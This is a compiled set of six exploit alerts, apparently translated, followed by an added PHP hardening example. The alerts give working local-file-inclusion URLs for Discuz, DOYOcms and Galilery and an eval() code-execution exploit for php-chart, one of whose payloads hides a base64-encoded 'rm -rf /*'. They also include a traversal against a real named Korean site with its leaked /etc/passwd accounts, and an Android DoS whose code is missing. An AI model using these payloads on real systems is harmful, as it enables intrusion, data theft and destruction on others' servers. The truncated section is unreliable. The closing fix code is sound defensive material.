The following is a collection of "Android Linux Kernel 2.6 local DoS" vulnerability alerts gathered and compiled by the editor. This post has 6 parts and is provided for reference only.

Part 1: Android Linux Kernel 2.6 Local DoS Vulnerability Alert
# Exploit Title: Android Kernel 2.6 Local DoS
# Date: 12/7/12
# Author: G13
# Twitter: @g13net
# Versions: Android 2.2, 2.3
# Category: DoS (android)
(The original header information above is retained.)
Repeatedly attempting to write a file whose file name is 2048 characters or longer to the SD card (vfat file system) causes a local DoS of the Android operating system.
Exploit conditions: Linux Kernel 2.6 (that is, versions before ICS).
Successfully running the exploit code causes the system to reboot.
#include
Below is the system debug output:
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
pid: 349, tid: 363, name: SensorService  >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
    r0 00000000  r1 00000008  r2 00000040  r3 00000000
    r4 2a114310  r5 00000000  r6 51504690  r7 00000025
    r8 2a114330  r9 2a114350  sl 00000003  fp 00000003
    ip fffd4084  sp 51501eb0  lr 40039b70  pc 40037cf0  cpsr 0010
    d0  4271bc7bd0b80000  d1  0000000000000000
    d2  0000000000000000  d3  427181eae900
    d4  0000000000000000  d5  0000000000000000
    d6  0000000000000000  d7  0000000000000000
    d8  0000000000000000  d9  0000000000000000
    d10 0000000000000000  d11 0000000000000000
    d12 0000000000000000  d13 0000000000000000
    d14 0000000000000000  d15 0000000000000000
    d16 3fe99999a0000000  d17 3fe999999999999a
    d18 0033003200310030  d19 0000000000000000
    d20 3fc554e7eb0eb47c  d21 3e66376972bea4d0
    d22 3f4de16b9c24a98f  d23 3fb0f4a31edab38b
    d24 3fede16b9c24a98f  d25 3fe55559ee5e69f9
    d26 0000000000000000  d27 0000000000000000
    d28 0000000000000005  d29 0000000000000000
    d30 0000000000000000  d31 0000000000000000
    scr 20000010

backtrace:
    #00 pc 0000dcf0 /system/lib/libc.so (kill+12)
    #01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
    #16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

Part 2: DISCUZX1.5 Local File Inclusion Vulnerability Alert
DISCUZ X1.5 local file inclusion. It is of course conditional: the file-based cache must be in use.
config_global.php:
$_config['cache']['type'] = 'file';

function cachedata($cachenames) {
    ......
    $isfilecache = getglobal('config/cache/type') == 'file';
    ......
    if($isfilecache) {
        $lostcaches = array();
        foreach($cachenames as $cachename) {
            if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {
                $lostcaches[] = $cachename;
            }
        }
        ......
    }
}

URL:
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Output:
Authracation has expiried
The code of the api/uc.php page was executed.
Author: Jannock

Part 3: DOYOcms Local File Inclusion Vulnerability Alert
This is the CMS in question; it is quite simple. Here:
$handle_controller = syClass($__controller, null, $GLOBALS['G_DY']["controller_path"].'/'.$__controller.".php");
Continuing down: $sdir here is not filtered at all. Now look at the import function, which includes the file directly. Combining this with the earlier
$GLOBALS['G_DY']["controller_path"].'/'.$__controller.".php"
$__controller is a variable under our control and is not filtered either, so we can truncate with %00 and then include our uploaded file to reach the goal. That is also the weak point: truncation requires a PHP version below 5.4 (I do not remember exactly myself), because newer versions fixed the truncation bug, and magic quotes must be off.
(Screenshot of the successful inclusion; the image is not preserved in this copy.)
Exp:
localhost/test/index.php?c=../uploads//06/1.gif%00&a=type&tid=1

Part 4: Local Inclusion Hole on a Korean Site Vulnerability Alert
url: www.kptc.or.kr/plaza/law.html?url=/../../../....
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
urisystem:x:500:500::/home/urisystem:/bin/bash
mysql:x:27:27:MySQL:/usr/local/mysql/var:/sbin/nologin
apache:x:48:48:apache:/home/httpd:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
bncworld:x:502:100::/home/bncworld:/bin/bash
healthju:x:503:100::/home/healthju:/bin/bash
siskorea:x:504:100::/home/siskorea:/bin/bash
sam2879:x:505:100::/home/sam2879:/bin/bash
nesc:x:506:100::/home/nesc:/bin/bash
kptc:x:508:100::/home/kptc:/bin/bash
moonhak:x:509:100::/home/moonhak:/bin/bash
eunjinmall:x:510:100::/home/eunjinmall:/bin/bash
wla:x:511:100::/home/wla:/bin/bash
master:x:512:512:eunjinmall.com:/home/eunjinmall/master:/bin/false
chang:x:513:513:eunjinmall.com:/home/eunjinmall/chang:/bin/false
eunjin:x:514:514:eunjinmall.com:/home/eunjinmall/eunjin:/bin/false
buy09:x:515:100::/home/buy09:/bin/bash
dailyecx:516:100::/home/dailyec/bin/bash
shop_wla:x:517:100::/home/shop_wla:/bin/bash
moonhak_wla:x:518:100::/home/moonhak_wla:/bin/bash
koreatown21:x:519:519::/home/iloveyou:/bin/bash

Part 5: Galilery 1.0 Local File Inclusion Vulnerability Alert
Galilery is an open-source photo album system written in PHP. Galilery 1.0 has a local file inclusion vulnerability that may lead to disclosure of sensitive information.
[+]info:
~~~~~~~~~
Galilery 1.0 Local File Inclusion Vulnerability
$ cat 15_lfi_galilery.1.0.txt
# exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve :
# ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/
[+]poc:
~~~~~~~~~
localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/
cuz:
index.php:
$d=$_GET['d'];
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/16206

Part 6: Executing Arbitrary Code via a Local Inclusion Vulnerability Alert
Affected software: php-chart_v1.0
Vendor site: php-charts.com/
Flaw type: PHP Code Execution.
===============================================================
Test platform: Debian squeeze 6.0.6
Server software: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
================================================================
About the software: Php-Charts is basically a class which can be used to generate different charts (Bar, Pie, Doughnut etc.) in different formats (PDF, PNG, JPG, HTML) using different data sources (csv, xml, MySQL, MS Sql, MS Access, PostgreSql, user defined data).
================================================================
Flaw analysis
root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
require("../lib/phpchart.class.php");
$color_var=array("txt_col","line_col","bg_color");
$cname=$_GET["type"];
$chart=new PHPChart($cname);
foreach($_GET as $key=>$value)
{
    if($value!="")
    {
        if(in_array($key,$color_var))
            eval('$chart->'.$key.'="#'.$value.'";');
        else if($value=='yes')
            eval('$chart->'.$key.'=true;');
        else if($value=='no')
            eval('$chart->'.$key.'=false;');
        else if(is_numeric($value))
            eval('$chart->'.$key.'='.$value.';');
        else
            eval('$chart->'.$key."='".$value."';");
    }
}
$chart->genChart();

Every $_GET key is pasted into an eval() string as a property name, so the key itself is evaluated as PHP.

Exploitation:
root@debian:/tmp# wget 'www.myhack58.com //wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
--2013-01-15 21:19:16--  hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "out.txt"

    [ <=> ] 1,917       --.-K/s   in 0s

2013-01-15 21:19:17 (8.56 MB/s) - "out.txt" saved [1917]

Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
  ["DOCUMENT_ROOT"]=> string(28) "/etc/apache2/htdocs/hacker1/"
  ["GATEWAY_INTERFACE"]=> string(7) "CGI/1.1"
  ["HTTP_ACCEPT"]=> string(3) "*/*"
  ["HTTP_CLIENT_IP"]=> string(9) "127.0.0.1"
  ["HTTP_HOST"]=> string(11) "hacker1.own"
  ["HTTP_USER_AGENT"]=> string(21) "Wget/1.12 (linux-gnu)"
  ["HTTP_VIA"]=> string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"
  ["HTTP_X_FORWARDED_FOR"]=> string(9) "127.0.0.1"
  ["PATH"]=> string(4) "/bin"
  ["PHPRC"]=> string(14) "/etc/php5/cgi/"
  ["QUERY_STRING"]=> string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
  ["REDIRECT_STATUS"]=> string(3) "200"
  ["REMOTE_ADDR"]=> string(9) "127.0.0.1"
  ["REMOTE_PORT"]=> string(5) "60830"
  ["REQUEST_METHOD"]=> string(3) "GET"
  ["REQUEST_URI"]=> string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
  ["SCRIPT_FILENAME"]=> string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"
  ["SCRIPT_NAME"]=> string(30) "/wp/chart/chart/wizard/url.php"
  ["SERVER_ADDR"]=> string(9) "127.0.0.1"
  ["SERVER_ADMIN"]=> string(21) "webmaster@hacker1.own"
  ["SERVER_NAME"]=> string(11) "hacker1.own"
  ["SERVER_PORT"]=> string(2) "80"
  ["SERVER_PROTOCOL"]=> string(8) "HTTP/1.1"
  ["SERVER_SIGNATURE"]=> string(0) ""
  ["SERVER_SOFTWARE"]=> string(6) "Apache"
  ["UNIQUE_ID"]=> string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"
  ["PHP_SELF"]=> string(30) "/wp/chart/chart/wizard/url.php"
  ["REQUEST_TIME"]=> int(1358302756)
}
Notice: Undefined variable:  in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#

Example 2:
hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL
=====================ENDS HERE============================
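The two sinks that recur on this page are an include()/require() whose file name comes from the request (Parts 2, 3 and 5) and an eval() that builds property assignments from request keys (Part 6). The block below is an added example written for this page; it is not code from Discuz, DOYOcms, Galilery or php-charts. safe_include() replaces the "DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php'" style of lookup with an identifier check plus a realpath() containment check, which rejects "../" and "%00" together. apply_chart_options() replaces the eval() loop in url.php with an allowlist of option names and types, so property names never come from $_GET. The PHPChart class, the genChart() method and the three colour options come from the url.php listing; the other option names and the list of chart types are assumptions.

```php
<?php
// Added example (not the projects' own code): hardened versions of the two
// request-to-code sinks shown on this page.

/**
 * Include a file chosen by name from a fixed directory.
 * The name must be a plain identifier (no "/", "..", NUL bytes), and the
 * resolved path must stay inside $base_dir. Returns false, without including
 * anything, when any check fails.
 * Example call for the Discuz case: safe_include(DISCUZ_ROOT.'/data/cache', $cachename, 'cache_');
 */
function safe_include($base_dir, $name, $prefix = '', $ext = '.php')
{
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
        return false;               // rejects "../", "%00" and path separators
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $prefix . $name . $ext);
    // realpath() resolves symlinks and "..", so a prefix comparison is reliable
    if ($base === false || $path === false ||
        strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return include_once $path;
}

/**
 * Copy allowlisted, type-checked options from $params onto $chart without
 * eval(). Property names come from the $spec table, never from the request;
 * unknown keys and malformed values are dropped.
 */
function apply_chart_options($chart, array $params)
{
    $spec = array(
        'txt_col' => 'color', 'line_col' => 'color', 'bg_color' => 'color',
        'width' => 'int', 'height' => 'int', 'show_legend' => 'bool',   // assumed option names
    );
    foreach ($spec as $key => $kind) {
        if (!isset($params[$key]) || !is_string($params[$key]) || $params[$key] === '') {
            continue;               // also skips array-valued parameters such as ?width[]=1
        }
        $v = $params[$key];
        if ($kind === 'color' && preg_match('/^[0-9a-fA-F]{6}$/', $v)) {
            $chart->$key = '#' . $v;
        } elseif ($kind === 'int' && ctype_digit($v)) {
            $chart->$key = (int) $v;
        } elseif ($kind === 'bool' && ($v === 'yes' || $v === 'no')) {
            $chart->$key = ($v === 'yes');
        }
        // any other value is silently ignored rather than evaluated
    }
    return $chart;
}

// Replacement body for url.php (assumes lib/phpchart.class.php defines PHPChart):
require("../lib/phpchart.class.php");
$types = array('bar', 'pie', 'doughnut');                 // assumed supported chart types
$cname = isset($_GET['type']) ? $_GET['type'] : '';
if (!in_array($cname, $types, true)) {
    header('HTTP/1.1 400 Bad Request');
    exit('unsupported chart type');
}
$chart = apply_chart_options(new PHPChart($cname), $_GET);
$chart->genChart();
```

The identifier regex is deliberately stricter than "strip ../": it also blocks the NUL-byte truncation used in Part 3, and the realpath() comparison catches anything the regex might let through on an unusual file system. In apply_chart_options() the loop iterates over the allowlist rather than over $_GET, which is the property that removes the injection: a request key that is not in $spec is never looked at, so there is nothing for an attacker-controlled key to reach.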